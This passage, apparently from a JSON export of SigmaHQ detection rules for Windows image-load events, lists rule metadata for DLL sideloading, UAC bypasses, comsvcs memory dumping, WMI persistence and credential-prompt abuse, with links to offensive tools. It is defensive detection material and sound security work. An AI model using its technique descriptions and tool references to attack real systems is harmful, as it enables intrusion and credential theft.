"creation_date": "2024-04-15", "falsepositive": [ "Unknown" ], "filename": "image_load_side_load_keyscrambler.yml", "level": "high", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://csirt-cti.net/2024/02/01/stately-taurus-continued-new-information-on-cyberespionage-attacks-against-myanmar-military-junta/", "https://bazaar.abuse.ch/sample/5cb9876681f78d3ee8a01a5aaa5d38b05ec81edc48b09e3865b75c49a2187831/", "https://twitter.com/DTCERT/status/1712785426895839339", "https://twitter.com/Max_Mal_/status/1775222576639291859", "https://thehackernews.com/2024/03/two-chinese-apt-groups-ramp-up-cyber.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_keyscrambler.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1574.001", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d2451be2-b582-4e15-8701-4196ac180260", "value": "Potential DLL Sideloading Of KeyScramblerIE.DLL Via KeyScrambler.EXE" }, { "description": "Detects signs of potential use of the WSMAN provider from uncommon processes locally and remote execution.", "meta": { "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "creation_date": "2020-06-24", "falsepositive": [ "Unknown" ], "filename": "image_load_wsman_provider_image_load.yml", "level": "medium", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://github.com/bohops/WSMan-WinRM", "https://twitter.com/chadtilbury/status/1275851297770610688", "https://learn.microsoft.com/en-us/windows/win32/winrm/windows-remote-management-architecture", "https://bohops.com/2020/05/12/ws-management-com-another-approach-for-winrm-lateral-movement/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_wsman_provider_image_load.yml" ], "tags": [ "attack.execution", "attack.t1059.001", "attack.lateral-movement", "attack.t1021.003" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "68a0c5ed-bee2-4513-830d-5b0d650139bd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ad1f4bb9-8dfb-4765-adb6-2a7cfb6c0f94", "value": "Suspicious WSMAN Provider Image Loads" }, { "description": "Detects potential DLL sideloading of \"mfdetours.dll\". While using \"mftrace.exe\" it can be abused to attach to an arbitrary process and force load any DLL named \"mfdetours.dll\" from the current directory of execution.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-08-03", "falsepositive": [ "Unlikely" ], "filename": "image_load_side_load_mfdetours.yml", "level": "medium", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_mfdetours.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1574.001", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d2605a99-2218-4894-8fd3-2afb7946514d", "value": "Potential Mfdetours.DLL Sideloading" }, { "description": "Detects rundll32 loading a renamed comsvcs.dll to dump process memory", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-14", "falsepositive": [ "Unlikely" ], "filename": "image_load_dll_comsvcs_load_renamed_version_by_rundll32.yml", "level": "high", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://twitter.com/sbousseaden/status/1555200155351228419", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_dll_comsvcs_load_renamed_version_by_rundll32.yml" ], "tags": [ "attack.credential-access", "attack.defense-evasion", "attack.t1003.001" ] }, "related": [ { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8cde342c-ba48-4b74-b615-172c330f2e93", "value": "Suspicious Renamed Comsvcs DLL Loaded By Rundll32" }, { "description": "Detects potential DLL sideloading of \"wwlib.dll\"", "meta": { "author": "X__Junior (Nextron Systems)", "creation_date": "2023-05-18", "falsepositive": [ "Unknown" ], "filename": "image_load_side_load_wwlib.yml", "level": "medium", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://securelist.com/apt-luminousmoth/103332/", "https://twitter.com/WhichbufferArda/status/1658829954182774784", "https://news.sophos.com/en-us/2022/11/03/family-tree-dll-sideloading-cases-may-be-related/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_wwlib.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1574.001", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e2e01011-5910-4267-9c3b-4149ed5479cf", "value": "Potential WWlib.DLL Sideloading" }, { "description": "Detects potential DLL sideloading of a signed dbghelp.dll by the Sysinternals VMMap.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-09-05", "falsepositive": [ "Unknown" ], "filename": "image_load_side_load_vmmap_dbghelp_signed.yml", "level": "medium", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://techcommunity.microsoft.com/t5/sysinternals-blog/zoomit-v7-1-procdump-2-0-for-linux-process-explorer-v17-05/ba-p/3884766", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_vmmap_dbghelp_signed.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence", "attack.privilege-escalation", "attack.t1574.001", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "98ffaed4-aec2-4e04-9b07-31492fe68b3d", "value": "VMMap Signed Dbghelp.DLL Potential Sideloading" }, { "description": "Detects WMI command line event consumers", "meta": { "author": "Thomas Patzke", "creation_date": "2018-03-07", "falsepositive": [ "Unknown (data set is too small; further testing needed)" ], "filename": "image_load_wmi_persistence_commandline_event_consumer.yml", "level": "high", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_wmi_persistence_commandline_event_consumer.yml" ], "tags": [ "attack.t1546.003", "attack.persistence" ] }, "related": [ { "dest-uuid": "910906dd-8c0a-475a-9cc1-5e029e2fad58", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "05936ce2-ee05-4dae-9d03-9a391cf2d2c6", "value": "WMI Persistence - Command Line Event Consumer" }, { "description": "Detects potential DLL sideloading of \"RjvPlatform.dll\" by \"SystemResetPlatform.exe\" located in a non-default location.", "meta": { "author": "X__Junior (Nextron Systems)", "creation_date": "2023-06-09", "falsepositive": [ "Unlikely" ], "filename": "image_load_side_load_rjvplatform_non_default_location.yml", "level": "high", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://twitter.com/0gtweet/status/1666716511988330499", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_rjvplatform_non_default_location.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1574.001", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0e0bc253-07ed-43f1-816d-e1b220fe8971", "value": "Potential RjvPlatform.DLL Sideloading From Non-Default Location" }, { "description": "Detects DLL sideloading of DLLs that are part of third party software (zoom, discord....etc)", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", "creation_date": "2022-08-17", "falsepositive": [ "Unknown" ], "filename": "image_load_side_load_third_party.yml", "level": "medium", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://hijacklibs.net/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_third_party.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence", "attack.privilege-escalation", "attack.t1574.001", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f9df325d-d7bc-4a32-8a1a-2cc61dcefc63", "value": "Third Party Software DLL Sideloading" }, { "description": "Detect usage of the \"coregen.exe\" (Microsoft CoreCLR Native Image Generator) binary to sideload arbitrary DLLs.", "meta": { "author": "frack113", "creation_date": "2022-12-31", "falsepositive": [ "Unknown" ], "filename": "image_load_side_load_coregen.yml", "level": "medium", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Coregen/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_coregen.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218", "attack.t1055" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0fa66f66-e3f6-4a9c-93f8-4f2610b00171", "value": "Potential DLL Sideloading Using Coregen.exe" }, { "description": "Detects potential DLL sideloading of \"SolidPDFCreator.dll\"", "meta": { "author": "X__Junior (Nextron Systems)", "creation_date": "2023-05-07", "falsepositive": [ "Unknown" ], "filename": "image_load_side_load_solidpdfcreator.yml", "level": "medium", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://lab52.io/blog/new-mustang-pandas-campaing-against-australia/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_solidpdfcreator.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1574.001", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a2edbce1-95c8-4291-8676-0d45146862b3", "value": "Potential SolidPDFCreator.DLL Sideloading" }, { "description": "Detects the image load of VSS DLL by uncommon executables", "meta": { "author": "frack113", "creation_date": "2023-02-17", "falsepositive": [ "Unknown" ], "filename": "image_load_dll_vsstrace_susp_load.yml", "level": "high", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://github.com/ORCx41/DeleteShadowCopies", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_dll_vsstrace_susp_load.yml" ], "tags": [ "attack.defense-evasion", "attack.impact", "attack.t1490" ] }, "related": [ { "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "48bfd177-7cf2-412b-ad77-baf923489e82", "value": "Suspicious Volume Shadow Copy Vsstrace.dll Load" }, { "description": "Detects DLL sideloading of VMGuestLib.dll by the WmiApSrv service.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-12-01", "falsepositive": [ "FP could occur if the legitimate version of vmGuestLib already exists on the system" ], "filename": "image_load_side_load_vmguestlib.yml", "level": "medium", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://decoded.avast.io/martinchlumecky/png-steganography/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_vmguestlib.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence", "attack.privilege-escalation", "attack.t1574.001", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "70e8e9b4-6a93-4cb7-8cde-da69502e7aff", "value": "VMGuestLib DLL Sideload" }, { "description": "Detects signs of the WMI script host process \"scrcons.exe\" loading scripting DLLs which could indicates WMI ActiveScriptEventConsumers EventConsumers activity.", "meta": { "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "creation_date": "2020-09-02", "falsepositive": [ "Legitimate event consumers", "Dell computers on some versions register an event consumer that is known to cause false positives when brightness is changed by the corresponding keyboard button" ], "filename": "image_load_scrcons_wmi_scripteventconsumer.yml", "level": "medium", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://threathunterplaybook.com/hunts/windows/200902-RemoteWMIActiveScriptEventConsumers/notebook.html", "https://twitter.com/HunterPlaybook/status/1301207718355759107", "https://www.mdsec.co.uk/2020/09/i-like-to-move-it-windows-lateral-movement-part-1-wmi-event-subscription/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_scrcons_wmi_scripteventconsumer.yml" ], "tags": [ "attack.lateral-movement", "attack.privilege-escalation", "attack.persistence", "attack.t1546.003" ] }, "related": [ { "dest-uuid": "910906dd-8c0a-475a-9cc1-5e029e2fad58", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b439f47d-ef52-4b29-9a2f-57d8a96cb6b8", "value": "WMI ActiveScriptEventConsumers Activity Via Scrcons.EXE DLL Load" }, { "description": "Detects image load events of system control panel items (.cpl) from uncommon or non-system locations which might be the result of sideloading.", "meta": { "author": "Anish Bogati", "creation_date": "2024-01-09", "falsepositive": [ "Unknown" ], "filename": "image_load_side_load_cpl_from_non_system_location.yml", "level": "medium", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://www.hexacorn.com/blog/2024/01/06/1-little-known-secret-of-fondue-exe/", "https://www.hexacorn.com/blog/2024/01/01/1-little-known-secret-of-hdwwiz-exe/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_cpl_from_non_system_location.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036" ] }, "related": [ { "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2b140a5c-dc02-4bb8-b6b1-8bdb45714cde", "value": "System Control Panel Item Loaded From Uncommon Location" }, { "description": "Detects any assembly DLL being loaded by an Office Product", "meta": { "author": "Antonlovesdnb", "creation_date": "2020-02-19", "falsepositive": [ "Unknown" ], "filename": "image_load_office_dotnet_assembly_dll_load.yml", "level": "medium", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_office_dotnet_assembly_dll_load.yml" ], "tags": [ "attack.execution", "attack.t1204.002" ] }, "related": [ { "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ff0f2b05-09db-4095-b96d-1b75ca24894a", "value": "DotNET Assembly DLL Loaded Via Office Application" }, { "description": "The Fax service attempts to load ualapi.dll, which is non-existent. An attacker can then (side)load their own malicious DLL using this service.", "meta": { "author": "NVISO", "creation_date": "2020-05-04", "falsepositive": [ "Unlikely" ], "filename": "image_load_side_load_ualapi.yml", "level": "high", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://windows-internals.com/faxing-your-way-to-system/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_ualapi.yml" ], "tags": [ "attack.persistence", "attack.defense-evasion", "attack.t1574.001", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "828af599-4c53-4ed2-ba4a-a9f835c434ea", "value": "Fax Service DLL Search Order Hijack" }, { "description": "Detects the \"iscsicpl.exe\" UAC bypass technique that leverages a DLL Search Order hijacking technique to load a custom DLL's from temp or a any user controlled location in the users %PATH%", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-07-17", "falsepositive": [ "Unknown" ], "filename": "image_load_uac_bypass_iscsicpl.yml", "level": "high", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://twitter.com/wdormann/status/1547583317410607110", "https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_uac_bypass_iscsicpl.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1548.002" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9ed5959a-c43c-4c59-84e3-d28628429456", "value": "UAC Bypass Using Iscsicpl - ImageLoad" }, { "description": "Detects loading of essential DLLs used by PowerShell by non-PowerShell process.\nDetects behavior similar to meterpreter's \"load powershell\" extension.\n", "meta": { "author": "Tom Kern, oscd.community, Natalia Shornikova, Tim Shelton, Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "creation_date": "2019-11-14", "falsepositive": [ "Used by some .NET binaries, minimal on user workstation.", "Used by Microsoft SQL Server Management Studio" ], "filename": "image_load_dll_system_management_automation_susp_load.yml", "level": "medium", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://adsecurity.org/?p=2921", "https://github.com/p3nt4/PowerShdll", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_dll_system_management_automation_susp_load.yml" ], "tags": [ "attack.t1059.001", "attack.execution" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "092bc4b9-3d1d-43b4-a6b4-8c8acd83522f", "value": "PowerShell Core DLL Loaded By Non PowerShell Process" }, { "description": "Detect DLL Load from Spooler Service backup folder", "meta": { "author": "FPT.EagleEye, Thomas Patzke (improvements)", "creation_date": "2021-06-29", "falsepositive": [ "Loading of legitimate driver" ], "filename": "image_load_spoolsv_dll_load.yml", "level": "informational", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://github.com/ly4k/SpoolFool", "https://web.archive.org/web/20210629055600/https://github.com/hhlxf/PrintNightmare/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_spoolsv_dll_load.yml" ], "tags": [ "attack.persistence", "attack.defense-evasion", "attack.privilege-escalation", "attack.t1574", "cve.2021-1675", "cve.2021-34527" ] }, "related": [ { "dest-uuid": "aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "02fb90de-c321-4e63-a6b9-25f4b03dfd14", "value": "Windows Spooler Service Suspicious Binary Load" }, { "description": "Detects potential DLL sideloading of \"goopdate.dll\", a DLL used by googleupdate.exe", "meta": { "author": "X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-05-15", "falsepositive": [ "False positives are expected from Google Chrome installations running from user locations (AppData) and other custom locations. Apply additional filters accordingly.", "Other third party chromium browsers located in AppData" ], "filename": "image_load_side_load_goopdate.yml", "level": "medium", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/goofy-guineapig/NCSC-MAR-Goofy-Guineapig.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_goopdate.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1574.001", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b6188d2f-b3c4-4d2c-a17d-9706e0851af0", "value": "Potential Goopdate.DLL Sideloading" }, { "description": "Detects windows utilities loading an unsigned or untrusted DLL.\nAdversaries often abuse those programs to proxy execution of malicious code.\n", "meta": { "author": "Swachchhanda Shrawan Poudel", "creation_date": "2024-02-28", "falsepositive": [ "Unknown" ], "filename": "image_load_susp_unsigned_dll.yml", "level": "medium", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://akhere.hashnode.dev/hunting-unsigned-dlls-using-kql", "https://www.elastic.co/security-labs/Hunting-for-Suspicious-Windows-Libraries-for-Execution-and-Evasion", "https://unit42.paloaltonetworks.com/unsigned-dlls/?web_view=true", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_unsigned_dll.yml" ], "tags": [ "attack.t1218.011", "attack.t1218.010", "attack.defense-evasion" ] }, "related": [ { "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "b97f1d35-4249-4486-a6b5-ee60ccf24fab", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b5de0c9a-6f19-43e0-af4e-55ad01f550af", "value": "Unsigned DLL Loaded by Windows Utility" }, { "description": "Attempts to load dismcore.dll after dropping it", "meta": { "author": "oscd.community, Dmitry Uchakin", "creation_date": "2020-10-06", "falsepositive": [ "Actions of a legitimate telnet client" ], "filename": "image_load_uac_bypass_via_dism.yml", "level": "high", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://steemit.com/utopian-io/@ah101/uac-bypassing-utility", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_uac_bypass_via_dism.yml" ], "tags": [ "attack.persistence", "attack.defense-evasion", "attack.privilege-escalation", "attack.t1548.002", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a5ea83a7-05a5-44c1-be2e-addccbbd8c03", "value": "UAC Bypass With Fake DLL" }, { "description": "Detects potential DLL sideloading of \"chrome_frame_helper.dll\"", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", "creation_date": "2022-08-17", "falsepositive": [ "Unknown" ], "filename": "image_load_side_load_chrome_frame_helper.yml", "level": "medium", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://hijacklibs.net/entries/3rd_party/google/chrome_frame_helper.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_chrome_frame_helper.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence", "attack.privilege-escalation", "attack.t1574.001", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "72ca7c75-bf85-45cd-aca7-255d360e423c", "value": "Potential Chrome Frame Helper DLL Sideloading" }, { "description": "Detects potential DLL sideloading of \"roboform.dll\", a DLL used by RoboForm Password Manager", "meta": { "author": "X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-05-14", "falsepositive": [ "If installed on a per-user level, the path would be located in \"AppData\\Local\". Add additional filters to reflect this mode of installation" ], "filename": "image_load_side_load_robform.yml", "level": "medium", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://twitter.com/StopMalvertisin/status/1648604148848549888", "https://www.roboform.com/", "https://twitter.com/t3ft3lb/status/1656194831830401024", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_robform.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1574.001", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f64c9b2d-b0ad-481d-9d03-7fc75020892a", "value": "Potential RoboForm.DLL Sideloading" }, { "description": "Detects loading of \"RjvPlatform.dll\" by the \"SystemResetPlatform.exe\" binary which can be abused as a method of DLL side loading since the \"$SysReset\" directory isn't created by default.", "meta": { "author": "X__Junior (Nextron Systems)", "creation_date": "2023-06-09", "falsepositive": [ "Unknown" ], "filename": "image_load_side_load_rjvplatform_default_location.yml", "level": "medium", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://twitter.com/0gtweet/status/1666716511988330499", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_rjvplatform_default_location.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1574.001", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "259dda31-b7a3-444f-b7d8-17f96e8a7d0d", "value": "Potential RjvPlatform.DLL Sideloading From Default Location" }, { "description": "Detects loading of \"credui.dll\" and related DLLs by an uncommon process. Attackers might leverage this DLL for potential use of \"CredUIPromptForCredentials\" or \"CredUnPackAuthenticationBufferW\".", "meta": { "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "creation_date": "2020-10-20", "falsepositive": [ "Other legitimate processes loading those DLLs in your environment." ], "filename": "image_load_dll_credui_uncommon_process_load.yml", "level": "medium", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://github.com/S12cybersecurity/RDPCredentialStealer", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.002/T1056.002.md#atomic-test-2---powershell---prompt-user-for-password", "https://securitydatasets.com/notebooks/atomic/windows/credential_access/SDWIN-201020013208.html", "https://learn.microsoft.com/en-us/windows/win32/api/wincred/nf-wincred-creduipromptforcredentialsa", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_dll_credui_uncommon_process_load.yml" ], "tags": [ "attack.credential-access", "attack.collection", "attack.t1056.002" ] }, "related": [ { "dest-uuid": "a2029942-0a85-4947-b23c-ca434698171d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9ae01559-cf7e-4f8e-8e14-4c290a1b4784", "value": "CredUI.DLL Loaded By Uncommon Process" }, { "description": "Detects unsigned module load by ClickOnce application.", "meta": { "author": "@SerkinValery", "creation_date": "2023-06-08", "falsepositive": [ "Unlikely" ], "filename": "image_load_susp_clickonce_unsigned_module_loaded.yml", "level": "medium", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_clickonce_unsigned_module_loaded.yml" ], "tags": [ "attack.persistence", 